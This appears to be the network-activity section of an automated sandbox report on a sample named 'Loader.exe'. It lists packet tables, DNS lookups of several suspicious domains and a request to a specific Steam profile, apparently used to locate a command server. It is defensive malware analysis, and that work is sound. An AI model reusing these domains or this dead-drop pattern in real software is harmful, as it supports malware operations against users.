Mar 11, 2025 01:14:03.690593004 CET	49705	443	192.168.2.6	92.122.104.90
Mar 11, 2025 01:14:03.690623999 CET	443	49705	92.122.104.90	192.168.2.6
Mar 11, 2025 01:14:03.690642118 CET	49705	443	192.168.2.6	92.122.104.90
Mar 11, 2025 01:14:03.690675974 CET	49705	443	192.168.2.6	92.122.104.90
Mar 11, 2025 01:14:03.766581059 CET	443	49705	92.122.104.90	192.168.2.6
Mar 11, 2025 01:14:03.766638994 CET	443	49705	92.122.104.90	192.168.2.6
Mar 11, 2025 01:14:03.766668081 CET	49705	443	192.168.2.6	92.122.104.90
Mar 11, 2025 01:14:03.766736984 CET	49705	443	192.168.2.6	92.122.104.90
Mar 11, 2025 01:14:03.766789913 CET	443	49705	92.122.104.90	192.168.2.6
Mar 11, 2025 01:14:03.766841888 CET	49705	443	192.168.2.6	92.122.104.90
Mar 11, 2025 01:14:03.784379005 CET	443	49705	92.122.104.90	192.168.2.6
Mar 11, 2025 01:14:03.784446001 CET	49705	443	192.168.2.6	92.122.104.90
Mar 11, 2025 01:14:03.784461975 CET	443	49705	92.122.104.90	192.168.2.6
Mar 11, 2025 01:14:03.784538984 CET	443	49705	92.122.104.90	192.168.2.6
Mar 11, 2025 01:14:03.784590960 CET	49705	443	192.168.2.6	92.122.104.90
Mar 11, 2025 01:14:03.784614086 CET	49705	443	192.168.2.6	92.122.104.90
Mar 11, 2025 01:14:03.784636021 CET	443	49705	92.122.104.90	192.168.2.6
Mar 11, 2025 01:14:03.784651995 CET	49705	443	192.168.2.6	92.122.104.90
Mar 11, 2025 01:14:03.784657001 CET	443	49705	92.122.104.90	192.168.2.6
Mar 11, 2025 01:14:03.928499937 CET	49706	443	192.168.2.6	92.122.104.90
Mar 11, 2025 01:14:03.928565979 CET	443	49706	92.122.104.90	192.168.2.6
Mar 11, 2025 01:14:03.928648949 CET	49706	443	192.168.2.6	92.122.104.90
Mar 11, 2025 01:14:03.929166079 CET	49706	443	192.168.2.6	92.122.104.90
Mar 11, 2025 01:14:03.929183006 CET	443	49706	92.122.104.90	192.168.2.6
Mar 11, 2025 01:14:05.703321934 CET	443	49706	92.122.104.90	192.168.2.6
Mar 11, 2025 01:14:05.703408957 CET	49706	443	192.168.2.6	92.122.104.90
Mar 11, 2025 01:14:05.705427885 CET	49706	443	192.168.2.6	92.122.104.90
Mar 11, 2025 01:14:05.705436945 CET	443	49706	92.122.104.90	192.168.2.6
Mar 11, 2025 01:14:05.705763102 CET	443	49706	92.122.104.90	192.168.2.6
Mar 11, 2025 01:14:05.707372904 CET	49706	443	192.168.2.6	92.122.104.90
Mar 11, 2025 01:14:05.752316952 CET	443	49706	92.122.104.90	192.168.2.6
Mar 11, 2025 01:14:06.418777943 CET	443	49706	92.122.104.90	192.168.2.6
Mar 11, 2025 01:14:06.418814898 CET	443	49706	92.122.104.90	192.168.2.6
Mar 11, 2025 01:14:06.418833971 CET	443	49706	92.122.104.90	192.168.2.6
Mar 11, 2025 01:14:06.418859005 CET	49706	443	192.168.2.6	92.122.104.90
Mar 11, 2025 01:14:06.418885946 CET	443	49706	92.122.104.90	192.168.2.6
Mar 11, 2025 01:14:06.418926954 CET	49706	443	192.168.2.6	92.122.104.90
Mar 11, 2025 01:14:06.418951035 CET	49706	443	192.168.2.6	92.122.104.90
Mar 11, 2025 01:14:06.500390053 CET	443	49706	92.122.104.90	192.168.2.6
Mar 11, 2025 01:14:06.500458002 CET	443	49706	92.122.104.90	192.168.2.6
Mar 11, 2025 01:14:06.500477076 CET	443	49706	92.122.104.90	192.168.2.6
Mar 11, 2025 01:14:06.500541925 CET	49706	443	192.168.2.6	92.122.104.90
Mar 11, 2025 01:14:06.500555992 CET	443	49706	92.122.104.90	192.168.2.6
Mar 11, 2025 01:14:06.500574112 CET	49706	443	192.168.2.6	92.122.104.90
Mar 11, 2025 01:14:06.500603914 CET	49706	443	192.168.2.6	92.122.104.90
Mar 11, 2025 01:14:06.500957966 CET	49706	443	192.168.2.6	92.122.104.90
Mar 11, 2025 01:14:06.500977993 CET	443	49706	92.122.104.90	192.168.2.6
Mar 11, 2025 01:14:06.500993013 CET	49706	443	192.168.2.6	92.122.104.90
Mar 11, 2025 01:14:06.500998020 CET	443	49706	92.122.104.90	192.168.2.6
Mar 11, 2025 01:14:06.503091097 CET	49707	443	192.168.2.6	92.122.104.90
Mar 11, 2025 01:14:06.503140926 CET	443	49707	92.122.104.90	192.168.2.6
Mar 11, 2025 01:14:06.503236055 CET	49707	443	192.168.2.6	92.122.104.90
Mar 11, 2025 01:14:06.503556967 CET	49707	443	192.168.2.6	92.122.104.90
Mar 11, 2025 01:14:06.503572941 CET	443	49707	92.122.104.90	192.168.2.6
Mar 11, 2025 01:14:08.517988920 CET	443	49707	92.122.104.90	192.168.2.6
Mar 11, 2025 01:14:08.518073082 CET	49707	443	192.168.2.6	92.122.104.90
Mar 11, 2025 01:14:08.519952059 CET	49707	443	192.168.2.6	92.122.104.90
Mar 11, 2025 01:14:08.519964933 CET	443	49707	92.122.104.90	192.168.2.6
Mar 11, 2025 01:14:08.521110058 CET	443	49707	92.122.104.90	192.168.2.6
Mar 11, 2025 01:14:08.522376060 CET	49707	443	192.168.2.6	92.122.104.90
Mar 11, 2025 01:14:08.564328909 CET	443	49707	92.122.104.90	192.168.2.6
Mar 11, 2025 01:14:09.510101080 CET	443	49707	92.122.104.90	192.168.2.6
Mar 11, 2025 01:14:09.510127068 CET	443	49707	92.122.104.90	192.168.2.6
Mar 11, 2025 01:14:09.510142088 CET	443	49707	92.122.104.90	192.168.2.6
Mar 11, 2025 01:14:09.510298014 CET	49707	443	192.168.2.6	92.122.104.90
Mar 11, 2025 01:14:09.510334015 CET	443	49707	92.122.104.90	192.168.2.6
Mar 11, 2025 01:14:09.510390043 CET	49707	443	192.168.2.6	92.122.104.90
Mar 11, 2025 01:14:09.589785099 CET	443	49707	92.122.104.90	192.168.2.6
Mar 11, 2025 01:14:09.589848042 CET	443	49707	92.122.104.90	192.168.2.6
Mar 11, 2025 01:14:09.589931965 CET	49707	443	192.168.2.6	92.122.104.90
Mar 11, 2025 01:14:09.589961052 CET	443	49707	92.122.104.90	192.168.2.6
Mar 11, 2025 01:14:09.589997053 CET	49707	443	192.168.2.6	92.122.104.90
Mar 11, 2025 01:14:09.630352020 CET	443	49707	92.122.104.90	192.168.2.6
Mar 11, 2025 01:14:09.630393982 CET	443	49707	92.122.104.90	192.168.2.6
Mar 11, 2025 01:14:09.630439043 CET	443	49707	92.122.104.90	192.168.2.6
Mar 11, 2025 01:14:09.630517960 CET	49707	443	192.168.2.6	92.122.104.90
Mar 11, 2025 01:14:09.630546093 CET	49707	443	192.168.2.6	92.122.104.90
Mar 11, 2025 01:14:09.630805969 CET	49707	443	192.168.2.6	92.122.104.90
Mar 11, 2025 01:14:09.630825043 CET	443	49707	92.122.104.90	192.168.2.6
Mar 11, 2025 01:14:09.630836964 CET	49707	443	192.168.2.6	92.122.104.90
Mar 11, 2025 01:14:09.630842924 CET	443	49707	92.122.104.90	192.168.2.6
Mar 11, 2025 01:14:09.632838964 CET	49708	443	192.168.2.6	188.114.96.3
Mar 11, 2025 01:14:09.632884979 CET	443	49708	188.114.96.3	192.168.2.6
Mar 11, 2025 01:14:09.632977962 CET	49708	443	192.168.2.6	188.114.96.3
Mar 11, 2025 01:14:09.633349895 CET	49708	443	192.168.2.6	188.114.96.3
Mar 11, 2025 01:14:09.633363008 CET	443	49708	188.114.96.3	192.168.2.6
Mar 11, 2025 01:14:11.317004919 CET	443	49708	188.114.96.3	192.168.2.6
Mar 11, 2025 01:14:11.317159891 CET	49708	443	192.168.2.6	188.114.96.3
Mar 11, 2025 01:14:11.320852041 CET	49708	443	192.168.2.6	188.114.96.3
Mar 11, 2025 01:14:11.320869923 CET	443	49708	188.114.96.3	192.168.2.6
Mar 11, 2025 01:14:11.321110964 CET	443	49708	188.114.96.3	192.168.2.6
Mar 11, 2025 01:14:11.324774027 CET	49708	443	192.168.2.6	188.114.96.3
Mar 11, 2025 01:14:11.325115919 CET	49708	443	192.168.2.6	188.114.96.3
Mar 11, 2025 01:14:11.325129986 CET	443	49708	188.114.96.3	192.168.2.6
Mar 11, 2025 01:14:12.137648106 CET	443	49708	188.114.96.3	192.168.2.6
Mar 11, 2025 01:14:12.137972116 CET	49708	443	192.168.2.6	188.114.96.3
Mar 11, 2025 01:14:12.473210096 CET	49710	443	192.168.2.6	92.122.104.90
Mar 11, 2025 01:14:12.473261118 CET	443	49710	92.122.104.90	192.168.2.6
Mar 11, 2025 01:14:12.473337889 CET	49710	443	192.168.2.6	92.122.104.90
Mar 11, 2025 01:14:12.473665953 CET	49710	443	192.168.2.6	92.122.104.90
Mar 11, 2025 01:14:12.473679066 CET	443	49710	92.122.104.90	192.168.2.6
Mar 11, 2025 01:14:14.347007036 CET	443	49710	92.122.104.90	192.168.2.6
Mar 11, 2025 01:14:14.347106934 CET	49710	443	192.168.2.6	92.122.104.90
Mar 11, 2025 01:14:14.350210905 CET	49710	443	192.168.2.6	92.122.104.90
Mar 11, 2025 01:14:14.350225925 CET	443	49710	92.122.104.90	192.168.2.6
Mar 11, 2025 01:14:14.350486040 CET	443	49710	92.122.104.90	192.168.2.6
Mar 11, 2025 01:14:14.358314037 CET	49710	443	192.168.2.6	92.122.104.90
Mar 11, 2025 01:14:14.400367022 CET	443	49710	92.122.104.90	192.168.2.6
Mar 11, 2025 01:14:15.416374922 CET	443	49710	92.122.104.90	192.168.2.6
Mar 11, 2025 01:14:15.416409016 CET	443	49710	92.122.104.90	192.168.2.6
Mar 11, 2025 01:14:15.416424036 CET	443	49710	92.122.104.90	192.168.2.6
Mar 11, 2025 01:14:15.416510105 CET	49710	443	192.168.2.6	92.122.104.90
Mar 11, 2025 01:14:15.416543961 CET	443	49710	92.122.104.90	192.168.2.6
Mar 11, 2025 01:14:15.416661978 CET	49710	443	192.168.2.6	92.122.104.90
Mar 11, 2025 01:14:15.416661978 CET	49710	443	192.168.2.6	92.122.104.90
Mar 11, 2025 01:14:15.516294956 CET	443	49710	92.122.104.90	192.168.2.6
Mar 11, 2025 01:14:15.516349077 CET	443	49710	92.122.104.90	192.168.2.6
Mar 11, 2025 01:14:15.516521931 CET	49710	443	192.168.2.6	92.122.104.90
Mar 11, 2025 01:14:15.516556978 CET	443	49710	92.122.104.90	192.168.2.6
Mar 11, 2025 01:14:15.516624928 CET	49710	443	192.168.2.6	92.122.104.90
Mar 11, 2025 01:14:15.559732914 CET	443	49710	92.122.104.90	192.168.2.6
Mar 11, 2025 01:14:15.559798956 CET	443	49710	92.122.104.90	192.168.2.6
Mar 11, 2025 01:14:15.559828043 CET	443	49710	92.122.104.90	192.168.2.6
Mar 11, 2025 01:14:15.560019016 CET	49710	443	192.168.2.6	92.122.104.90
Mar 11, 2025 01:14:15.560019016 CET	49710	443	192.168.2.6	92.122.104.90
Mar 11, 2025 01:14:15.560199976 CET	49710	443	192.168.2.6	92.122.104.90
Mar 11, 2025 01:14:15.560199976 CET	49710	443	192.168.2.6	92.122.104.90
Mar 11, 2025 01:14:15.560269117 CET	443	49710	92.122.104.90	192.168.2.6
Mar 11, 2025 01:14:15.560357094 CET	443	49710	92.122.104.90	192.168.2.6
Mar 11, 2025 01:14:15.561779022 CET	49711	443	192.168.2.6	188.114.96.3
Mar 11, 2025 01:14:15.561816931 CET	443	49711	188.114.96.3	192.168.2.6
Mar 11, 2025 01:14:15.561901093 CET	49711	443	192.168.2.6	188.114.96.3
Mar 11, 2025 01:14:15.562186956 CET	49711	443	192.168.2.6	188.114.96.3
Mar 11, 2025 01:14:15.562196016 CET	443	49711	188.114.96.3	192.168.2.6
Mar 11, 2025 01:14:17.247039080 CET	443	49711	188.114.96.3	192.168.2.6
Mar 11, 2025 01:14:17.247224092 CET	49711	443	192.168.2.6	188.114.96.3
Mar 11, 2025 01:14:17.249015093 CET	49711	443	192.168.2.6	188.114.96.3
Mar 11, 2025 01:14:17.249027967 CET	443	49711	188.114.96.3	192.168.2.6
Mar 11, 2025 01:14:17.249300003 CET	443	49711	188.114.96.3	192.168.2.6
Mar 11, 2025 01:14:17.250581026 CET	49711	443	192.168.2.6	188.114.96.3
Mar 11, 2025 01:14:17.251379967 CET	49711	443	192.168.2.6	188.114.96.3
Mar 11, 2025 01:14:17.251408100 CET	443	49711	188.114.96.3	192.168.2.6
Mar 11, 2025 01:14:17.251526117 CET	49711	443	192.168.2.6	188.114.96.3
Mar 11, 2025 01:14:17.251550913 CET	443	49711	188.114.96.3	192.168.2.6
Mar 11, 2025 01:14:17.251668930 CET	49711	443	192.168.2.6	188.114.96.3
Mar 11, 2025 01:14:17.251722097 CET	443	49711	188.114.96.3	192.168.2.6
Mar 11, 2025 01:14:17.251857042 CET	49711	443	192.168.2.6	188.114.96.3
Mar 11, 2025 01:14:17.251883984 CET	443	49711	188.114.96.3	192.168.2.6
Mar 11, 2025 01:14:17.252046108 CET	49711	443	192.168.2.6	188.114.96.3
Mar 11, 2025 01:14:17.252077103 CET	443	49711	188.114.96.3	192.168.2.6
Mar 11, 2025 01:14:17.252233028 CET	49711	443	192.168.2.6	188.114.96.3
Mar 11, 2025 01:14:17.252265930 CET	443	49711	188.114.96.3	192.168.2.6
Mar 11, 2025 01:14:17.252279043 CET	49711	443	192.168.2.6	188.114.96.3
Mar 11, 2025 01:14:17.252295017 CET	443	49711	188.114.96.3	192.168.2.6
Mar 11, 2025 01:14:17.252423048 CET	49711	443	192.168.2.6	188.114.96.3
Mar 11, 2025 01:14:17.252450943 CET	443	49711	188.114.96.3	192.168.2.6
Mar 11, 2025 01:14:17.252475977 CET	49711	443	192.168.2.6	188.114.96.3
Mar 11, 2025 01:14:17.252490997 CET	443	49711	188.114.96.3	192.168.2.6
Mar 11, 2025 01:14:17.252620935 CET	49711	443	192.168.2.6	188.114.96.3
Mar 11, 2025 01:14:17.252640963 CET	443	49711	188.114.96.3	192.168.2.6
Mar 11, 2025 01:14:17.252671957 CET	49711	443	192.168.2.6	188.114.96.3
Mar 11, 2025 01:14:17.252684116 CET	443	49711	188.114.96.3	192.168.2.6
Mar 11, 2025 01:14:17.252702951 CET	49711	443	192.168.2.6	188.114.96.3
Mar 11, 2025 01:14:17.252729893 CET	443	49711	188.114.96.3	192.168.2.6
Mar 11, 2025 01:14:17.252834082 CET	49711	443	192.168.2.6	188.114.96.3
Mar 11, 2025 01:14:17.252862930 CET	443	49711	188.114.96.3	192.168.2.6
Mar 11, 2025 01:14:17.252888918 CET	49711	443	192.168.2.6	188.114.96.3
Mar 11, 2025 01:14:17.252902985 CET	443	49711	188.114.96.3	192.168.2.6
Mar 11, 2025 01:14:17.252923012 CET	49711	443	192.168.2.6	188.114.96.3
Mar 11, 2025 01:14:17.252935886 CET	443	49711	188.114.96.3	192.168.2.6
Mar 11, 2025 01:14:19.900576115 CET	443	49711	188.114.96.3	192.168.2.6
Mar 11, 2025 01:14:19.900883913 CET	49711	443	192.168.2.6	188.114.96.3
Mar 11, 2025 01:14:19.912635088 CET	49713	443	192.168.2.6	23.197.127.21
Mar 11, 2025 01:14:19.912708998 CET	443	49713	23.197.127.21	192.168.2.6
Mar 11, 2025 01:14:19.912789106 CET	49713	443	192.168.2.6	23.197.127.21
Mar 11, 2025 01:14:19.913094997 CET	49713	443	192.168.2.6	23.197.127.21
Mar 11, 2025 01:14:19.913109064 CET	443	49713	23.197.127.21	192.168.2.6
Mar 11, 2025 01:14:20.907181978 CET	49713	443	192.168.2.6	23.197.127.21
Mar 11, 2025 01:14:20.909133911 CET	49714	443	192.168.2.6	23.197.127.21
Mar 11, 2025 01:14:20.909188986 CET	443	49714	23.197.127.21	192.168.2.6
Mar 11, 2025 01:14:20.909265995 CET	49714	443	192.168.2.6	23.197.127.21
Mar 11, 2025 01:14:20.909662962 CET	49714	443	192.168.2.6	23.197.127.21
Mar 11, 2025 01:14:20.909676075 CET	443	49714	23.197.127.21	192.168.2.6
Mar 11, 2025 01:14:23.606435061 CET	443	49714	23.197.127.21	192.168.2.6
Mar 11, 2025 01:14:23.606565952 CET	49714	443	192.168.2.6	23.197.127.21
Mar 11, 2025 01:14:23.607882023 CET	49714	443	192.168.2.6	23.197.127.21
Mar 11, 2025 01:14:23.607891083 CET	443	49714	23.197.127.21	192.168.2.6
Mar 11, 2025 01:14:23.608117104 CET	443	49714	23.197.127.21	192.168.2.6
Mar 11, 2025 01:14:23.609420061 CET	49714	443	192.168.2.6	23.197.127.21
Mar 11, 2025 01:14:23.656317949 CET	443	49714	23.197.127.21	192.168.2.6
Mar 11, 2025 01:14:24.507160902 CET	443	49714	23.197.127.21	192.168.2.6
Mar 11, 2025 01:14:24.507191896 CET	443	49714	23.197.127.21	192.168.2.6
Mar 11, 2025 01:14:24.507210970 CET	443	49714	23.197.127.21	192.168.2.6
Mar 11, 2025 01:14:24.507278919 CET	49714	443	192.168.2.6	23.197.127.21
Mar 11, 2025 01:14:24.507313013 CET	443	49714	23.197.127.21	192.168.2.6
Mar 11, 2025 01:14:24.507330894 CET	49714	443	192.168.2.6	23.197.127.21
Mar 11, 2025 01:14:24.507363081 CET	49714	443	192.168.2.6	23.197.127.21
Mar 11, 2025 01:14:24.608999968 CET	443	49714	23.197.127.21	192.168.2.6
Mar 11, 2025 01:14:24.609054089 CET	443	49714	23.197.127.21	192.168.2.6
Mar 11, 2025 01:14:24.609118938 CET	49714	443	192.168.2.6	23.197.127.21
Mar 11, 2025 01:14:24.609142065 CET	443	49714	23.197.127.21	192.168.2.6
Mar 11, 2025 01:14:24.609178066 CET	49714	443	192.168.2.6	23.197.127.21
Mar 11, 2025 01:14:24.643482924 CET	443	49714	23.197.127.21	192.168.2.6
Mar 11, 2025 01:14:24.643537998 CET	443	49714	23.197.127.21	192.168.2.6
Mar 11, 2025 01:14:24.643568993 CET	443	49714	23.197.127.21	192.168.2.6
Mar 11, 2025 01:14:24.643572092 CET	49714	443	192.168.2.6	23.197.127.21
Mar 11, 2025 01:14:24.643627882 CET	49714	443	192.168.2.6	23.197.127.21
Mar 11, 2025 01:14:24.643872976 CET	49714	443	192.168.2.6	23.197.127.21
Mar 11, 2025 01:14:24.643888950 CET	443	49714	23.197.127.21	192.168.2.6
Mar 11, 2025 01:14:24.643902063 CET	49714	443	192.168.2.6	23.197.127.21
Mar 11, 2025 01:14:24.643908024 CET	443	49714	23.197.127.21	192.168.2.6
Mar 11, 2025 01:14:24.645347118 CET	49716	443	192.168.2.6	188.114.96.3
Mar 11, 2025 01:14:24.645370960 CET	443	49716	188.114.96.3	192.168.2.6
Mar 11, 2025 01:14:24.645461082 CET	49716	443	192.168.2.6	188.114.96.3
Mar 11, 2025 01:14:24.645745039 CET	49716	443	192.168.2.6	188.114.96.3
Mar 11, 2025 01:14:24.645752907 CET	443	49716	188.114.96.3	192.168.2.6
Mar 11, 2025 01:14:26.337199926 CET	443	49716	188.114.96.3	192.168.2.6
Mar 11, 2025 01:14:26.337292910 CET	49716	443	192.168.2.6	188.114.96.3
Mar 11, 2025 01:14:26.365361929 CET	49716	443	192.168.2.6	188.114.96.3
Mar 11, 2025 01:14:26.365382910 CET	443	49716	188.114.96.3	192.168.2.6
Mar 11, 2025 01:14:26.365647078 CET	443	49716	188.114.96.3	192.168.2.6
Mar 11, 2025 01:14:26.412730932 CET	49716	443	192.168.2.6	188.114.96.3
Mar 11, 2025 01:14:26.473429918 CET	49716	443	192.168.2.6	188.114.96.3
Mar 11, 2025 01:14:26.473459959 CET	49716	443	192.168.2.6	188.114.96.3
Mar 11, 2025 01:14:26.473572016 CET	443	49716	188.114.96.3	192.168.2.6
Mar 11, 2025 01:14:27.118855953 CET	443	49716	188.114.96.3	192.168.2.6
Mar 11, 2025 01:14:27.118905067 CET	443	49716	188.114.96.3	192.168.2.6
Mar 11, 2025 01:14:27.118926048 CET	443	49716	188.114.96.3	192.168.2.6
Mar 11, 2025 01:14:27.119029999 CET	49716	443	192.168.2.6	188.114.96.3
Mar 11, 2025 01:14:27.119057894 CET	443	49716	188.114.96.3	192.168.2.6
Mar 11, 2025 01:14:27.119105101 CET	49716	443	192.168.2.6	188.114.96.3
Mar 11, 2025 01:14:27.133465052 CET	443	49716	188.114.96.3	192.168.2.6
Mar 11, 2025 01:14:27.136765957 CET	443	49716	188.114.96.3	192.168.2.6
Mar 11, 2025 01:14:27.136792898 CET	443	49716	188.114.96.3	192.168.2.6
Mar 11, 2025 01:14:27.136828899 CET	49716	443	192.168.2.6	188.114.96.3
Mar 11, 2025 01:14:27.136842966 CET	443	49716	188.114.96.3	192.168.2.6
Mar 11, 2025 01:14:27.136897087 CET	49716	443	192.168.2.6	188.114.96.3
Mar 11, 2025 01:14:27.143855095 CET	443	49716	188.114.96.3	192.168.2.6
Mar 11, 2025 01:14:27.143958092 CET	443	49716	188.114.96.3	192.168.2.6
Mar 11, 2025 01:14:27.144066095 CET	49716	443	192.168.2.6	188.114.96.3
Mar 11, 2025 01:14:27.144159079 CET	49716	443	192.168.2.6	188.114.96.3
Mar 11, 2025 01:14:27.144176006 CET	443	49716	188.114.96.3	192.168.2.6
Mar 11, 2025 01:14:27.144212008 CET	49716	443	192.168.2.6	188.114.96.3
Mar 11, 2025 01:14:27.144217968 CET	443	49716	188.114.96.3	192.168.2.6

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 11, 2025 01:13:20.934973001 CET	49896	53	192.168.2.6	1.1.1.1
Mar 11, 2025 01:13:20.943960905 CET	53	49896	1.1.1.1	192.168.2.6
Mar 11, 2025 01:13:20.948765039 CET	57743	53	192.168.2.6	1.1.1.1
Mar 11, 2025 01:13:20.957216024 CET	53	57743	1.1.1.1	192.168.2.6
Mar 11, 2025 01:13:20.958992958 CET	50247	53	192.168.2.6	1.1.1.1
Mar 11, 2025 01:13:21.104136944 CET	53	50247	1.1.1.1	192.168.2.6
Mar 11, 2025 01:13:21.126682997 CET	64564	53	192.168.2.6	1.1.1.1
Mar 11, 2025 01:13:21.136972904 CET	53	64564	1.1.1.1	192.168.2.6
Mar 11, 2025 01:13:21.138245106 CET	59434	53	192.168.2.6	1.1.1.1
Mar 11, 2025 01:13:21.147032022 CET	53	59434	1.1.1.1	192.168.2.6
Mar 11, 2025 01:13:21.148447037 CET	63198	53	192.168.2.6	1.1.1.1
Mar 11, 2025 01:13:21.156510115 CET	53	63198	1.1.1.1	192.168.2.6
Mar 11, 2025 01:13:21.158210993 CET	55343	53	192.168.2.6	1.1.1.1
Mar 11, 2025 01:13:21.168992043 CET	53	55343	1.1.1.1	192.168.2.6
Mar 11, 2025 01:13:21.171345949 CET	54240	53	192.168.2.6	1.1.1.1
Mar 11, 2025 01:13:21.181298018 CET	53	54240	1.1.1.1	192.168.2.6
Mar 11, 2025 01:13:21.193792105 CET	55712	53	192.168.2.6	1.1.1.1
Mar 11, 2025 01:13:21.202743053 CET	53	55712	1.1.1.1	192.168.2.6
Mar 11, 2025 01:13:21.207936049 CET	52298	53	192.168.2.6	1.1.1.1
Mar 11, 2025 01:13:21.222955942 CET	53	52298	1.1.1.1	192.168.2.6
Mar 11, 2025 01:13:24.233139992 CET	59779	53	192.168.2.6	1.1.1.1
Mar 11, 2025 01:13:24.246342897 CET	53	59779	1.1.1.1	192.168.2.6
Mar 11, 2025 01:13:46.618729115 CET	60937	53	192.168.2.6	1.1.1.1
Mar 11, 2025 01:13:46.627008915 CET	53	60937	1.1.1.1	192.168.2.6
Mar 11, 2025 01:13:57.943048954 CET	64191	53	192.168.2.6	1.1.1.1
Mar 11, 2025 01:13:57.950649023 CET	53	64191	1.1.1.1	192.168.2.6
Mar 11, 2025 01:14:12.464405060 CET	56028	53	192.168.2.6	1.1.1.1
Mar 11, 2025 01:14:12.472383022 CET	53	56028	1.1.1.1	192.168.2.6
Mar 11, 2025 01:14:19.904977083 CET	64885	53	192.168.2.6	1.1.1.1
Mar 11, 2025 01:14:19.911761999 CET	53	64885	1.1.1.1	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Mar 11, 2025 01:13:20.934973001 CET	192.168.2.6	1.1.1.1	0xaeb6	Standard query (0)	defaulemot.run	A (IP address)	IN (0x0001)	false
Mar 11, 2025 01:13:20.948765039 CET	192.168.2.6	1.1.1.1	0x2f98	Standard query (0)	begindecafer.world	A (IP address)	IN (0x0001)	false
Mar 11, 2025 01:13:20.958992958 CET	192.168.2.6	1.1.1.1	0x85d3	Standard query (0)	garagedrootz.top	A (IP address)	IN (0x0001)	false
Mar 11, 2025 01:13:21.126682997 CET	192.168.2.6	1.1.1.1	0xc6ca	Standard query (0)	modelshiverd.icu	A (IP address)	IN (0x0001)	false
Mar 11, 2025 01:13:21.138245106 CET	192.168.2.6	1.1.1.1	0x458c	Standard query (0)	arisechairedd.shop	A (IP address)	IN (0x0001)	false
Mar 11, 2025 01:13:21.148447037 CET	192.168.2.6	1.1.1.1	0x7419	Standard query (0)	catterjur.run	A (IP address)	IN (0x0001)	false
Mar 11, 2025 01:13:21.158210993 CET	192.168.2.6	1.1.1.1	0xc60a	Standard query (0)	orangemyther.live	A (IP address)	IN (0x0001)	false
Mar 11, 2025 01:13:21.171345949 CET	192.168.2.6	1.1.1.1	0x1b82	Standard query (0)	fostinjec.today	A (IP address)	IN (0x0001)	false
Mar 11, 2025 01:13:21.193792105 CET	192.168.2.6	1.1.1.1	0xb5bd	Standard query (0)	sterpickced.digital	A (IP address)	IN (0x0001)	false
Mar 11, 2025 01:13:21.207936049 CET	192.168.2.6	1.1.1.1	0xabcf	Standard query (0)	steamcommunity.com	A (IP address)	IN (0x0001)	false
Mar 11, 2025 01:13:24.233139992 CET	192.168.2.6	1.1.1.1	0x781b	Standard query (0)	areawannte.bet	A (IP address)	IN (0x0001)	false
Mar 11, 2025 01:13:46.618729115 CET	192.168.2.6	1.1.1.1	0xb76b	Standard query (0)	steamcommunity.com	A (IP address)	IN (0x0001)	false
Mar 11, 2025 01:13:57.943048954 CET	192.168.2.6	1.1.1.1	0x189a	Standard query (0)	steamcommunity.com	A (IP address)	IN (0x0001)	false
Mar 11, 2025 01:14:12.464405060 CET	192.168.2.6	1.1.1.1	0xb2c6	Standard query (0)	steamcommunity.com	A (IP address)	IN (0x0001)	false
Mar 11, 2025 01:14:19.904977083 CET	192.168.2.6	1.1.1.1	0x92da	Standard query (0)	steamcommunity.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Mar 11, 2025 01:13:20.943960905 CET	1.1.1.1	192.168.2.6	0xaeb6	Name error (3)	defaulemot.run	none	none	A (IP address)	IN (0x0001)	false
Mar 11, 2025 01:13:20.957216024 CET	1.1.1.1	192.168.2.6	0x2f98	Name error (3)	begindecafer.world	none	none	A (IP address)	IN (0x0001)	false
Mar 11, 2025 01:13:21.104136944 CET	1.1.1.1	192.168.2.6	0x85d3	Name error (3)	garagedrootz.top	none	none	A (IP address)	IN (0x0001)	false
Mar 11, 2025 01:13:21.136972904 CET	1.1.1.1	192.168.2.6	0xc6ca	Name error (3)	modelshiverd.icu	none	none	A (IP address)	IN (0x0001)	false
Mar 11, 2025 01:13:21.147032022 CET	1.1.1.1	192.168.2.6	0x458c	Name error (3)	arisechairedd.shop	none	none	A (IP address)	IN (0x0001)	false
Mar 11, 2025 01:13:21.156510115 CET	1.1.1.1	192.168.2.6	0x7419	Name error (3)	catterjur.run	none	none	A (IP address)	IN (0x0001)	false
Mar 11, 2025 01:13:21.168992043 CET	1.1.1.1	192.168.2.6	0xc60a	Name error (3)	orangemyther.live	none	none	A (IP address)	IN (0x0001)	false
Mar 11, 2025 01:13:21.181298018 CET	1.1.1.1	192.168.2.6	0x1b82	Name error (3)	fostinjec.today	none	none	A (IP address)	IN (0x0001)	false
Mar 11, 2025 01:13:21.202743053 CET	1.1.1.1	192.168.2.6	0xb5bd	Name error (3)	sterpickced.digital	none	none	A (IP address)	IN (0x0001)	false
Mar 11, 2025 01:13:21.222955942 CET	1.1.1.1	192.168.2.6	0xabcf	No error (0)	steamcommunity.com		92.122.104.90	A (IP address)	IN (0x0001)	false
Mar 11, 2025 01:13:24.246342897 CET	1.1.1.1	192.168.2.6	0x781b	No error (0)	areawannte.bet		188.114.96.3	A (IP address)	IN (0x0001)	false
Mar 11, 2025 01:13:24.246342897 CET	1.1.1.1	192.168.2.6	0x781b	No error (0)	areawannte.bet		188.114.97.3	A (IP address)	IN (0x0001)	false
Mar 11, 2025 01:13:46.627008915 CET	1.1.1.1	192.168.2.6	0xb76b	No error (0)	steamcommunity.com		92.122.104.90	A (IP address)	IN (0x0001)	false
Mar 11, 2025 01:13:57.950649023 CET	1.1.1.1	192.168.2.6	0x189a	No error (0)	steamcommunity.com		92.122.104.90	A (IP address)	IN (0x0001)	false
Mar 11, 2025 01:14:12.472383022 CET	1.1.1.1	192.168.2.6	0xb2c6	No error (0)	steamcommunity.com		92.122.104.90	A (IP address)	IN (0x0001)	false
Mar 11, 2025 01:14:19.911761999 CET	1.1.1.1	192.168.2.6	0x92da	No error (0)	steamcommunity.com		23.197.127.21	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

steamcommunity.com

areawannte.bet

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49692	92.122.104.90	443	7660	C:\Users\user\Desktop\Loader.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-11 00:13:23 UTC	94	OUT	GET /profiles/76561199822375128 HTTP/1.1 Connection: Keep-Alive Host: steamcommunity.com
